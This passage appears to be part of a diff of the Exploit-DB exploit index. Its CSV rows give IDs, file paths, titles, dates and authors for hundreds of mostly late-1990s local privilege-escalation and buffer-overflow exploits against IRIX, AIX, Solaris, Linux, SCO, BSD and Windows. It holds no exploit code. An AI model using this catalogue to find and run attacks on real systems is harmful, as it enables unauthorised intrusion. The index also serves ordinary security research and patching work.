'eject' Local Privilege Escalation (1)",1997-05-25,DCRH,irix,local, -19277,exploits/irix/local/19277.c,"SGI IRIX 6.2 - 'eject' Local Privilege Escalation (2)",1997-05-25,"Last Stage of Delirium",irix,local, -19279,exploits/linux/local/19279.sh,"RedHat Linux 2.1 - 'abuse.console' Local Privilege Escalation",1996-02-02,"David J Meltzer",linux,local, -19280,exploits/irix/local/19280.txt,"SGI IRIX 6.2 - 'fsdump' Local Privilege Escalation",1996-12-03,"Jaechul Choe",irix,local, -19281,exploits/linux/local/19281.c,"RedHat Linux 5.1 - xosview",1999-05-28,"Chris Evans",linux,local, -19283,exploits/linux/local/19283.c,"Slackware Linux 3.1 - '/usr/X11/bin/SuperProbe' Local Buffer Overflow",1997-03-04,Solar,linux,local, -19284,exploits/linux/local/19284.c,"Armidale Software Yapp Conferencing System 2.2 - Local Buffer Overflow",1998-01-20,satan,linux,local, -19285,exploits/linux/local/19285.txt,"Slackware Linux 3.1/3.2 - 'color_xterm' Local Buffer Overflow (1)",1997-05-27,zgv,linux,local, -19286,exploits/linux/local/19286.c,"Slackware Linux 3.1/3.2 - 'color_xterm' Local Buffer Overflow (2)",1997-05-27,"Solar Designer",linux,local, -19287,exploits/aix/local/19287.c,"IBM AIX 4.3 - 'infod' Local Privilege Escalation",1998-11-21,"Repent Security Inc",aix,local, -19293,exploits/windows/local/19293.py,"Sysax 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local, -19602,exploits/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",linux,local, -19300,exploits/aix/local/19300.txt,"IBM AIX 4.2.1 - 'snap' Insecure Temporary File Creation",1999-02-17,"Larry W. Cashdollar",aix,local, -19302,exploits/linux/local/19302.c,"Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH",1998-01-19,Solar,linux,local, -19304,exploits/irix/local/19304.txt,"SGI IRIX 6.4 - 'inpview' Local Privilege Escalation",1997-05-07,"Yuri Volobuev",irix,local, -19305,exploits/linux/local/19305.c,"RedHat Linux 5.0 - 'msgchk' Local Privilege Escalation",1998-01-19,"Cesar Tascon Alvarez",linux,local, -19306,exploits/aix/local/19306.c,"IBM AIX 4.2.1 - '/usr/bin/portmir' Local Buffer Overflow / Insecure Temporary File Creation",1997-10-29,"BM ERS Team",aix,local, -19307,exploits/aix/local/19307.c,"IBM AIX 4.2 - 'ping' Local Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local, -19309,exploits/aix/local/19309.c,"IBM AIX 4.2 - '/usr/sbin/lchangelv' Local Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local, -19310,exploits/irix/local/19310.c,"SGI IRIX 6.4 - 'login' Local Privilege Escalation",1997-05-26,"David Hedley",irix,local, -19311,exploits/linux/local/19311.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local, -19312,exploits/linux/local/19312.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' (2)",1998-06-25,segv,linux,local, -19313,exploits/irix/local/19313.txt,"SGI IRIX 6.4 - 'netprint' Local Privilege Escalation",1997-01-04,"Yuri Volobuev",irix,local, -19314,exploits/linux/local/19314.c,"RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - 'klogd' Local Buffer Overflow (1)",1999-02-26,"Michal Zalewski",linux,local, -19315,exploits/linux/local/19315.c,"RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - 'klogd' Local Buffer Overflow (2)",1999-02-26,"Esa Etelavuori",linux,local, -19317,exploits/irix/local/19317.c,"SGI IRIX 5.3/6.2 - 'ordist' Local Privilege Escalation",1997-05-24,"Yuri Volobuev",irix,local, -19318,exploits/aix/local/19318.c,"SGI IRIX 6.4 - Permissions Buffer Overflow",1997-05-26,"David Hedley",aix,local, -19319,exploits/irix/local/19319.txt,"SGI IRIX 5.3 - 'pkgadjust' Local Privilege Escalation",1996-09-23,"Hui-Hui Hu",irix,local, -19411,exploits/bsd/local/19411.txt,"BSDI BSD/OS 4.0 /FreeBSD 3.2 /NetBSD 1.4 x86 / OpenBSD 2.5 - UFS Secure Level 1",1999-07-02,Stealth,bsd,local, -19412,exploits/windows/local/19412.c,"Qbik WinGate 3.0 - Registry",1999-02-22,Chris,windows,local, -19323,exploits/windows/local/19323.c,"URL Hunter - Local Buffer Overflow (DEP Bypass)",2012-06-21,Ayrbyte,windows,local, -19341,exploits/solaris/local/19341.c,"Solaris 2.5.1 - 'kcms' Local Buffer Overflow (1)",1998-12-24,"Cheez Whiz",solaris,local, -19342,exploits/solaris/local/19342.c,"Solaris 2.5.1 - 'kcms' Local Buffer Overflow (2)",1998-12-24,UNYUN,solaris,local, -19343,exploits/solaris/local/19343.c,"Solaris 2.5.1 - rsh socket Descriptor",1997-06-19,"Alan Cox",solaris,local, -19344,exploits/aix/local/19344.sh,"IBM AIX 3.2.5 - 'IFS' Local Privilege Escalation",1994-04-02,anonymous,aix,local, -19345,exploits/aix/local/19345.txt,"IBM AIX 4.2.1 - 'lquerypv' File Read",1996-11-24,Aleph1,aix,local, -19346,exploits/freebsd/local/19346.c,"FreeBSD 3.1 / Solaris 2.6 - Domain Socket",1997-06-19,"Thamer Al-Herbish",freebsd,local, -19347,exploits/irix/local/19347.c,"SGI IRIX 6.3 - 'pset' Local Privilege Escalation",1997-07-17,"Last Stage of Delirium",irix,local, -19349,exploits/irix/local/19349.txt,"SGI IRIX 6.4 - 'rmail' Local Privilege Escalation",1997-05-07,"Yuri Volobuev",irix,local, -19350,exploits/solaris/local/19350.sh,"Solaris 2.5.1 - License Manager",1998-10-21,"Joel Eriksson",solaris,local, -19351,exploits/irix/local/19351.sh,"SGI IRIX 5.2/5.3 - 'serial_ports' Local Privilege Escalation",1994-02-02,transit,irix,local, -19353,exploits/irix/local/19353.txt,"SGI IRIX 6.4 - 'suid_exec' Local Privilege Escalation",1996-12-02,"Yuri Volobuev",irix,local, -19354,exploits/aix/local/19354.txt,"SGI IRIX 5.1/5.2 - 'sgihelp' Local Privilege Escalation",1996-12-02,anonymous,aix,local, -19355,exploits/irix/local/19355.txt,"SGI IRIX 6.4 - 'startmidi' Local Privilege Escalation",1997-02-09,"David Hedley",irix,local, -19356,exploits/irix/local/19356.txt,"SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Local Privilege Escalation",1996-10-30,"Tun-Hui Hu",irix,local, -19358,exploits/irix/local/19358.txt,"SGI IRIX 6.4 - 'xfsdump' Local Privilege Escalation",1997-05-07,"Yuri Volobuev",irix,local, -19359,exploits/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",windows,local, -19360,exploits/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Local Buffer Overflow",1997-12-21,"Solar Designer",linux,local, -19362,exploits/sco/local/19362.c,"SCO Open Server 5.0.5 - XBase Buffer Overflow",1999-06-14,doble,sco,local, -19364,exploits/netware/local/19364.txt,"Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption",1999-04-09,dreamer,netware,local, -19384,exploits/linux/local/19384.c,"Debian 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local, -19370,exploits/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x/5.0 - Local Buffer Overflow",1999-06-25,KSR[T],linux,local, -19371,exploits/linux/local/19371.c,"VMware 1.0.1 - Local Buffer Overflow",1999-06-25,funkysh,linux,local, -19373,exploits/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E 6.1 - 'Lsof' Local Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local, -19374,exploits/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E 6.1 - 'Lsof' Local Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local, -19376,exploits/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 - ISAPI GetExtensionVersion()",1999-03-08,"Fabien Royer",windows,local, -19417,exploits/osx/local/19417.txt,"Apple Mac OS 8 8.6 - Weak Password Encryption",1999-07-10,"Dawid adix Adamski",osx,local, -19418,exploits/aix/local/19418.txt,"IBM AIX 4.3.1 - 'adb' Denial of Service",1999-07-12,"GZ Apple",aix,local, -19419,exploits/linux/local/19419.c,"Linux Kernel 2.0.37 - Segment Limit Privilege Escalation",1999-07-13,Solar,linux,local, -19422,exploits/linux/local/19422.txt,"BMC Software Patrol 3.2.5 - Patrol SNMP Agent File Creation/Permission",1999-07-14,"Andrew Alness",linux,local, -19425,exploits/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local, -19427,exploits/osx/local/19427.txt,"Apple At Ease 5.0 - Information Disclosure",1999-05-13,"Tim Conrad",osx,local, -19428,exploits/linux/local/19428.c,"Samba < 2.0.5 - Local Overflow",1999-07-21,"Gerald Britton",linux,local, -19429,exploits/linux/local/19429.sh,"Rational Software ClearCase for Unix 3.2 - ClearCase SUID",1999-05-02,Mudge,linux,local, -19430,exploits/multiple/local/19430.txt,"GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage",1999-07-25,"Pawel Wilk",multiple,local, -19433,exploits/windows/local/19433.rb,"Apple QuickTime - TeXML Stack Buffer Overflow (Metasploit)",2012-06-28,Metasploit,windows,local, -19434,exploits/osx/local/19434.txt,"Quinn - 'the Eskimo' and Peter N. Lewis Internet Configuration 1.0/2.0 Weak Password Encryption",1999-07-28,"Dawid adix Adamski",osx,local, -19437,exploits/osx/local/19437.txt,"ELS Screen to Screen 1.0 - Multiple Password Vulnerabilities",1999-07-29,"Prozaq of mSec",osx,local, -19438,exploits/osx/local/19438.txt,"Ogopogo Autothenticate 1.1.5 - Weak Password Encryption",1999-07-29,"Prozaq of mSec",osx,local, -19439,exploits/osx/local/19439.txt,"Power On Software On Guard for MacOS 3.2 - Emergency Password",1999-07-29,"Prozaq of mSec",osx,local, -19440,exploits/windows/local/19440.c,"Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 - Malformed Dialer Entry",1999-07-30,"David Litchfield",windows,local, -19447,exploits/multiple/local/19447.c,"NetBSD 1.4 / OpenBSD 2.5 / Solaris 7.0 - 'profil(2)' Modify The Internal Data Space",1999-08-09,"Ross Harvey",multiple,local, -19460,exploits/multiple/local/19460.sh,"Oracle 8 8.1.5 - Intelligent Agent (1)",1999-08-16,"Brock Tellier",multiple,local, -19461,exploits/multiple/local/19461.c,"Oracle 8 8.1.5 - Intelligent Agent (2)",1999-08-16,"Gilles PARC",multiple,local, -19462,exploits/windows/local/19462.c,"Microsoft Windows 95/98 Internet Explorer 5/Telnet - Local Heap Overflow",1999-08-16,"Jeremy Kothe",windows,local, -19464,exploits/linux/local/19464.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Local Buffer Overflow (1)",1999-08-18,m0f0,linux,local, -19465,exploits/linux/local/19465.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Local Buffer Overflow (2)",1999-08-18,sk8,linux,local, -19467,exploits/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 - 'pt_chown' Local Privilege Escalation",1999-08-23,"Michal Zalewski",linux,local, -19469,exploits/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E Linux 6.0/6.1 - Cron Buffer Overflow (1)",1999-08-30,Akke,linux,local, -19470,exploits/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E Linux 6.0/6.1 - Cron Buffer Overflow (2)",1999-08-25,jbowie,linux,local, -19472,exploits/windows/local/19472.txt,"IBM GINA for NT 1.0 - Local Privilege Escalation",1999-08-23,"Frank Pikelner",windows,local, -19473,exploits/windows/local/19473.txt,"Microsoft Internet Explorer 5 - FTP Password Storage",1999-08-25,"Makoto Shiotsuki",windows,local, -19474,exploits/linux/local/19474.txt,"Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat 6.0 - Vixie Cron MAILTO Sendmail",1999-08-25,"Olaf Kirch",linux,local, -19480,exploits/multiple/local/19480.c,"ISC INN 2.2 / RedHat Linux 6.0 - inews Buffer Overflow",1999-09-02,bawd,multiple,local, -19485,exploits/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Local Buffer Overflow",1999-08-31,"Przemyslaw Frasunek",linux,local, -19497,exploits/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 - Local Buffer Overflow",1999-09-13,"Job de Haas of ITSX",multiple,local, -19498,exploits/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - 'dtspcd' Local Privilege Escalation",1999-09-13,"Job de Haas of ITSX",multiple,local, -19499,exploits/linux/local/19499.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (1)",1999-09-09,"Brock Tellier",linux,local, -19500,exploits/linux/local/19500.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (2)",1999-06-21,"The Dark Raver of CPNE",linux,local, -19501,exploits/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 / SunOS 4.1.4 - Local Buffer Overflow",1999-09-13,"Job de Haas of ITSX",linux,local, -19502,exploits/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation",1999-09-17,"Alberto Rodríguez Aragonés",windows,local, -19504,exploits/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 - GECOS Buffer Overflow",1999-09-21,"babcia padlina ltd",freebsd,local, -19506,exploits/windows/local/19506.txt,"MDAC 2.1.2.4202.3 / Microsoft Windows NT 4.0/SP1-6 JET/ODBC Patch / RDS Fix - Registry Key",1999-09-21,.rain.forest.puppy,windows,local, -19508,exploits/linux/local/19508.sh,"SuSE Linux 6.2 sscw - HOME Environment Variable Buffer Overflow",1999-09-23,"Brock Tellier",linux,local, -19509,exploits/solaris/local/19509.sh,"Solaris 2.6 - Profiling File Creation",1999-09-22,"Steve Mynott",solaris,local, -19510,exploits/linux/local/19510.pl,"SSH Communications Security SSH 1.2.27 - Authentication Socket File Creation",1999-09-17,"Tymm Twillman",linux,local, -19511,exploits/linux/local/19511.c,"Knox Software Arkeia 4.0 - Backup Local Overflow",1999-09-26,"Brock Tellier",linux,local, -19512,exploits/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0 / Gnome Libs 1.0.8 - 'espeaker' Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local, -19516,exploits/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS - ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local, -19517,exploits/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local, -19519,exploits/windows/local/19519.rb,"IrfanView JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,local, -19523,exploits/linux/local/19523.txt,"python-wrapper - Untrusted Search Path/Code Execution",2012-07-02,ShadowHatesYou,linux,local, -19528,exploits/windows/local/19528.txt,"Microsoft Internet Explorer 4.1/5 - Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",windows,local, -19529,exploits/solaris/local/19529.c,"Solaris 7.0 /usr/bin/mail - '-m' Local Buffer Overflow",1999-09-12,"Brock Tellier",solaris,local, -19533,exploits/solaris/local/19533.c,"Solaris 7.0 - 'ufsdump' Local Buffer Overflow (1)",1998-04-23,smm,solaris,local, -19534,exploits/solaris/local/19534.c,"Solaris 7.0 - 'ufsdump' Local Buffer Overflow (2)",1998-12-30,"Cheez Whiz",solaris,local, -19535,exploits/hp-ux/local/19535.pl,"HP-UX 10.20 newgrp - Local Privilege Escalation",1996-12-01,SOD,hp-ux,local, -19542,exploits/sco/local/19542.txt,"SCO Open Server 5.0.5 - 'userOsa' Symlink",1999-10-11,"Brock Tellier",sco,local, -19543,exploits/sco/local/19543.c,"SCO Open Server 5.0.5 - cancel Buffer Overflow",1999-10-08,"Brock Tellier",sco,local, -19544,exploits/linux/local/19544.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (1)",1996-10-25,"Vadim Kolontsov",linux,local, -19545,exploits/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - '/usr/bin/lpr' Buffer Overrun Privilege Escalation (2)",1996-10-25,"Vadim Kolontsov",bsd,local, -19546,exploits/multiple/local/19546.pl,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Local Overflow (1)",1997-04-17,"Pavel Kankovsky",multiple,local, -19547,exploits/multiple/local/19547.txt,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Local Overflow (2)",1997-04-17,"Willy Tarreau",multiple,local, -19551,exploits/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",multiple,local, -19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",multiple,local, -19556,exploits/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",multiple,local, -19565,exploits/linux/local/19565.sh,"SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Privilege Escalation",1999-10-22,"Brock Tellier",linux,local, -19673,exploits/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 - Help File Backdoor",1999-12-10,"Pauli Ojanpera",windows,local, -19674,exploits/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program Debugging",1999-12-10,"Brock Tellier",sco,local, -19676,exploits/linux/local/19676.c,"xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (1)",2000-05-17,"Brock Tellier",linux,local, -19677,exploits/linux/local/19677.c,"xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (2)",2000-05-17,"Larry W. Cashdollar",linux,local, -19582,exploits/unix/local/19582.c,"IRIX 6.5 / Solaris 7.0 / Turbolinux 4.2 - 'uum' Local Buffer Overflow",1999-11-02,UNYUN,unix,local, -19583,exploits/unix/local/19583.c,"Turbolinux 3.5 b2 - 'canuum' Local Buffer Overflow",1999-11-02,UNYUN,unix,local, -19585,exploits/windows/local/19585.c,"Yamaha MidiPlug 1.1 b-j MidiPlug - Local Buffer Overflow",1999-11-02,UNYUN,windows,local, -19590,exploits/unix/local/19590.c,"Hylafax Hylafax 4.0.2 - Local Buffer Overflow",1999-11-03,"Brock Tellier",unix,local, -19594,exploits/windows/local/19594.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Spoolss.exe' DLL Insertion",1999-11-04,"Marc of eEye",windows,local, -19609,exploits/freebsd/local/19609.txt,"Muhammad M. Saggaf Seyon 2.14b - Relative Path",1999-11-08,"Shawn Hillis",freebsd,local, -19610,exploits/windows/local/19610.c,"IrfanView32 3.0.7 - Image File Buffer Overflow",1999-11-09,UNYUN,windows,local, -19633,exploits/windows/local/19633.txt,"Microsoft Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 - Riched Buffer Overflow",1999-11-17,"Pauli Ojanpera",windows,local, -19641,exploits/sco/local/19641.c,"SCO Unixware 7.0/7.0.1/7.1 - Xsco Buffer Overflow",1999-11-25,K2,sco,local, -19642,exploits/sco/local/19642.c,"SCO Unixware 7.0 - 'xlock(1)' 'Username' Local Buffer Overflow",1999-11-25,AK,sco,local, -19643,exploits/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer Overflow",1999-10-30,K2,sco,local, -19647,exploits/solaris/local/19647.c,"Solaris 7.0 - 'kcms_configure' Local Overflow / Privilege Escalation",1999-11-30,UNYUN,solaris,local, -19648,exploits/solaris/local/19648.c,"Solaris 7.0 - CDE dtmail/mailtool Buffer Overflow",1999-11-30,UNYUN,solaris,local, -19649,exploits/freebsd/local/19649.c,"FreeBSD 3.3 - 'gdc' Local Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local, -19650,exploits/freebsd/local/19650.txt,"FreeBSD 3.3 - 'gdc' Symlink",1999-12-01,"Brock Tellier",freebsd,local, -19651,exploits/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon SetGID Dialer",1999-12-01,"Brock Tellier",freebsd,local, -19652,exploits/freebsd/local/19652.c,"FreeBSD 3.3 - 'xmindpath' Local Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local, -19653,exploits/freebsd/local/19653.c,"FreeBSD 3.3 - 'angband' Local Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local, -40430,exploits/windows/local/40430.cs,"Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local, -19654,exploits/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin' Local Privilege Escalation",1998-12-02,"Brock Tellier",sco,local, -19655,exploits/linux/local/19655.txt,"RSA Security RSAREF 2.0 - Local Buffer Overflow",1999-12-14,"Alberto Solino",linux,local, -19656,exploits/sco/local/19656.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'xauto' Local Buffer Overflow",1999-12-03,"Brock Tellier",sco,local, -19657,exploits/sco/local/19657.txt,"SCO Unixware 7.1 - '/var/mail' Permissions",1999-12-03,"Brock Tellier",sco,local, -19658,exploits/sco/local/19658.txt,"SCO Unixware 7.1 - 'pkg' Local Privilege Escalation",1999-12-03,"Brock Tellier",sco,local, -19659,exploits/sco/local/19659.sh,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink",1999-12-03,"Brock Tellier",sco,local, -19660,exploits/sco/local/19660.c,"SCO Unixware 7.1 pkgcat - Local Buffer Overflow",1999-12-06,"Brock Tellier",sco,local, -19661,exploits/sco/local/19661.c,"SCO Unixware 7.1 pkginstall - Local Buffer Overflow",1999-12-06,"Brock Tellier",sco,local, -19665,exploits/windows/local/19665.txt,"Microsoft Internet Explorer 5 - vnd.ms.radio URL",1999-12-06,"Jeremy Kothe",windows,local, -19678,exploits/windows/local/19678.c,"VDOLive Player 3.0.2 - Local Buffer Overflow",1999-12-13,UNYUN,windows,local, -19683,exploits/windows/local/19683.c,"Ipswitch IMail Server 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 - Weak Password Encryption",1999-12-19,"Mike Davis",windows,local, -19684,exploits/multiple/local/19684.c,"SCO Open Server 5.0.5 / IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library - Local Buffer Overflow",1999-12-20,"Last Stage of Delirium",multiple,local, -19685,exploits/freebsd/local/19685.txt,"Windowmaker wmmon 1.0 b2 - Command Execution",1999-12-22,"Steve Reid",freebsd,local, -19692,exploits/multiple/local/19692.c,"Netscape Communicator 4.5 - prefs.js Buffer Overflow",1999-12-24,"Steve Fewer",multiple,local, -19693,exploits/linux/local/19693.txt,"Python - Untrusted Search Path/Code Execution",2012-07-09,rogueclown,linux,local, -19697,exploits/unix/local/19697.c,"IBM Network Station Manager 2.0 R1 - Race Condition",1999-12-27,"Brock Tellier",unix,local, -19698,exploits/linux/local/19698.txt,"Great Circle Associates Majordomo 1.94.4 - Local resend",1999-12-28,"Brock Tellier",linux,local, -19699,exploits/linux/local/19699.txt,"Majordomo 1.94.4/1.94.5 - Local -C Parameter (1)",1999-12-29,Shevek,linux,local, -19700,exploits/linux/local/19700.c,"Majordomo 1.94.4/1.94.5 - Local -C Parameter (2)",1999-12-29,morpheus[bd],linux,local, -19704,exploits/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 - PATH",1999-12-30,Loneguard,multiple,local, -19706,exploits/irix/local/19706.sh,"SGI IRIX 6.2 - 'midikeys'/'soundplayer' Local Privilege Escalation",1999-12-31,Loneguard,irix,local, -19707,exploits/unix/local/19707.sh,"Ascend CascadeView/UX 1.0 tftpd - Symbolic Link",1999-12-31,Loneguard,unix,local, -19709,exploits/linux/local/19709.sh,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path (1)",2000-01-04,dildog,linux,local, -19710,exploits/linux/local/19710.c,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path (2)",2000-03-15,"Elias Levy",linux,local, -19721,exploits/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 - GRANT Global Password Changing",2000-02-15,"Viktor Fougstedt",multiple,local, -19723,exploits/linux/local/19723.txt,"Corel Linux OS 1.0 - get_it PATH",2000-01-12,"Cesar Tascon Alvarez",linux,local, -19726,exploits/bsd/local/19726.c,"FreeBSD 3.4 / NetBSD 1.4.1 / OpenBSD 2.6 - '/proc' FileSystem",2000-01-21,Nergal,bsd,local, -19727,exploits/linux/local/19727.c,"Inter7 vpopmail (vchkpw) 3.4.11 - Local Buffer Overflow",2000-01-21,K2,linux,local, -19728,exploits/windows/local/19728.txt,"Microsoft Systems Management Server 2.0 - Default Permissions",1999-12-29,"Frank Monroe",windows,local, -19733,exploits/windows/local/19733.txt,"McAfee 4.0 / Network Associates for Windows NT 4.0.2/4.0.3 a / Norton AntiVirus 2000 - Recycle Bin Exclusion",1999-12-22,"Neil Bortnak",windows,local, -19735,exploits/linux/local/19735.txt,"Debian 2.1 - apcd Symlink",2000-02-01,anonymous,linux,local, -19739,exploits/windows/local/19739.txt,"Microsoft Windows NT 4.0 - Recycle Bin Pre-created Folder",2000-02-01,"Arne Vidstron & Nobuo Miwa",windows,local, -19752,exploits/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink",2000-02-15,"Shawn Bracken",sco,local, -19754,exploits/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - 'autorun.inf' Code Execution",2000-02-18,"Eric Stevens",windows,local, -19756,exploits/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Local Privilege Escalation",2000-02-19,anonymous,freebsd,local, -19757,exploits/solaris/local/19757.txt,"Sun Workshop 5.0 - Licensing Manager Symlink",2000-02-21,sp00n,solaris,local, -19762,exploits/linux/local/19762.c,"FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption",2000-02-25,"Nelson Brito",linux,local, -19763,exploits/linux/local/19763.txt,"RedHat Linux 6.0 - Single User Mode Authentication",2000-02-23,"Darren Reed",linux,local, -19764,exploits/linux/local/19764.txt,"Corel Linux OS 1.0 - buildxconfig",2000-02-24,suid,linux,local, -19765,exploits/linux/local/19765.txt,"Corel Linux OS 1.0 - 'setxconf' Local Privilege Escalation",2000-02-24,suid,linux,local, -19776,exploits/windows/local/19776.pl,"ZipItFast PRO 3.0 - Local Heap Overflow",2012-07-12,b33f,windows,local, -19778,exploits/linux/local/19778.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (1)",2000-02-26,"Babcia Padlina",linux,local, -19779,exploits/linux/local/19779.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (2)",2000-02-26,"Babcia Padlina",linux,local, -19787,exploits/linux/local/19787.txt,"Corel Linux OS 1.0 - Dosemu Distribution Configuration",2000-03-02,suid,linux,local, -19789,exploits/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Local Buffer Overflow",2000-03-06,dildog,windows,local, -19794,exploits/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer - Local Privilege Escalation",2000-03-05,"Keyser Soze",linux,local, -19796,exploits/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",multiple,local, -19798,exploits/windows/local/19798.txt,"Microsoft Windows NT 4.0 - User Shell Folders",2000-03-09,anonymous,windows,local, -19802,exploits/linux/local/19802.c,"Sam Hawker wmcdplay 1.0 beta1-2 - Local Buffer Overflow (1)",2000-03-11,Krahmer,linux,local, -19803,exploits/linux/local/19803.txt,"Sam Hawker wmcdplay 1.0 beta1-2 - Local Buffer Overflow (2)",2000-03-13,"Larry W. Cashdolla",linux,local, 